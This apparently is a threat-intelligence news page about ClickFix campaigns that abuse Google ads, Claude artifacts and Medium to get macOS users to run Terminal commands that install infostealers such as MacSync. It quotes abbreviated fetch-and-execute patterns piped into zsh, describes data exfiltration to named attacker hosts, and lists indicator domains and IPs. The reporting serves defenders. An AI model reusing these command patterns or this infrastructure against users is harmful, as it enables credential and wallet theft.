ClickFix Campaign Abuses Claude Artifacts and Google Ads to Deliver macOS Infostealers
Threat actors are running a ClickFix-style social-engineering campaign that abuses Google sponsored search results to funnel macOS users to malicious content hosted on legitimate platforms, including Anthropic Claude public artifacts (claude.ai) and Medium pages impersonating trusted sources (e.g., Apple Support). The lures target common search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” then instruct victims to paste and run Terminal commands that decode/execute payloads (e.g., echo "..." | base64 -D | zsh or curl ... | zsh). Researchers (Moonlock Lab/MacPaw and AdGuard) reported that the malicious Claude artifact accumulated ~12,300 to 15,600 views, indicating significant exposure (reported as 10,000+ and 15,000+ potential victims across coverage).
The payloads deliver macOS information-stealing malware, including MacSync, which collects data such as Keychain credentials, browser data, and cryptocurrency wallet files. Reported tradecraft includes downloading and executing a shell script, using an AppleScript component for theft, staging stolen data into /tmp/osalogging.zip, and exfiltrating via HTTP POST to attacker infrastructure (e.g., a2abotnet[.]com/gate, with C2 paths like a2abotnet[.]com/dynamic). The malware attempts to blend in by spoofing legitimate macOS browser User-Agent strings and includes retry logic for large/chunked uploads, then removes staging artifacts to reduce forensic traces.
Timeline
Apr 22, 2026
Fake Claude download ad delivers new macOS ClickFix payload
On 2026-04-22, researchers documented a malicious Google ad that redirected users to a fake Claude download page at cladesktop.gitlab.io, where a ClickFix-style flow delivered a password-protected ZIP containing a Mach-O arm64 malware sample saved as /tmp/helper. The infection chain used newly registered infrastructure including arkypc.com for payload delivery and communicated with a command-and-control server at 45.94.47.204:80.
Feb 13, 2026
Researchers report campaign reach exceeded 15,000 views
Investigators observed that at least one malicious Claude guide had accumulated significant exposure, with reported view counts ranging from more than 10,000 to over 15,000. This indicated the campaign had reached a large pool of potential macOS victims through promoted search results and trusted hosting platforms.
Feb 13, 2026
Researchers link multiple campaign variants to the same actor
Analysis by Moonlock Lab and AdGuard found the Claude Artifact and Medium impersonation variants likely came from the same threat actor because both retrieved second-stage payloads from the same command-and-control infrastructure. Researchers also noted the campaign fit a broader pattern of threat actors abusing public AI-sharing features previously seen with ChatGPT and Grok.
Feb 13, 2026
MacSync infostealer delivered through Claude and Medium lures
Victims who executed the copied shell commands downloaded a loader that installed the MacSync infostealer. The malware used AppleScript and other built-in macOS tools to steal Keychain data, browser information, and cryptocurrency wallet data, package it into /tmp/osalogging.zip, and exfiltrate it to attacker infrastructure including a2abotnet[.]com/gate.
Feb 13, 2026
Threat actors launch ClickFix campaign targeting macOS users
A financially motivated campaign began using Google Ads and SEO-poisoned search results to lure macOS users to fake support or how-to pages. The pages abused trusted platforms including Anthropic Claude Artifacts and Medium to socially engineer victims into pasting malicious Terminal commands.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Malware
Organizations
Sources
1 more from sources like bleeping computer
Related Stories
ClickFix Campaigns Deliver MacSync Infostealer to macOS Users
Researchers reported **three ClickFix campaigns** that used social engineering rather than software exploitation to infect **macOS** users with the **MacSync** infostealer. The activity evolved over several months, beginning with fake sponsored search results for an **OpenAI Atlas** browser download hosted on fraudulent pages, then shifting to malicious workflows that abused shared **ChatGPT** conversations and GitHub-themed landing pages to make the infection chain appear legitimate. In each case, victims were instructed to open **Terminal** and paste commands, allowing the malware to be installed through user action instead of a traditional exploit. The most recent campaign introduced a more advanced **MacSync** variant with **multi-stage loaders**, **dynamic AppleScript payloads**, and **in-memory execution** intended to improve evasion and persistence. Reporting indicates the later activity targeted users in **Belgium, India, and parts of North and South America**, while researchers said it remains unclear whether all three campaigns were conducted by the same threat actor. The findings underscore a broader trend of attackers adapting **ClickFix** lures for macOS, using trusted platforms, sponsored links, and fake AI-tool installers to steal credentials and other sensitive data while bypassing file-based defenses by persuading users to execute the attack themselves.
Yesterday
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
1 months ago
ClickFix macOS Campaign Abuses Script Editor to Deploy Atomic Stealer
Researchers identified a **ClickFix-style** campaign targeting macOS users that swaps Terminal-based execution for **Script Editor** to bypass newer Apple protections. Victims are lured to fake Apple-themed pages such as “Reclaim disk space on your Mac,” which invoke the `applescript://` URL scheme and open Script Editor with a pre-filled AppleScript. If the user runs it, the script conceals a malicious shell command that decodes a URL, uses `curl` with TLS certificate validation disabled, and pipes the response directly into `zsh` for in-memory execution. The activity, discovered by **Jamf Threat Labs**, ultimately downloads and launches a Mach-O variant of **Atomic Stealer**, an infostealer built to harvest browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data from macOS systems. Researchers said the campaign appears to be an adaptation to Apple’s paste-command scanning protections added in macOS 26.4 for Terminal abuse; while newer macOS versions also warn about unidentified scripts, the attack can still succeed if users follow the prompts. Reported infrastructure tied to the campaign includes `dryvecar.com`, `storage-fixes.squarespace.com`, and `cleanupmac.mssg.me`.
3 weeks ago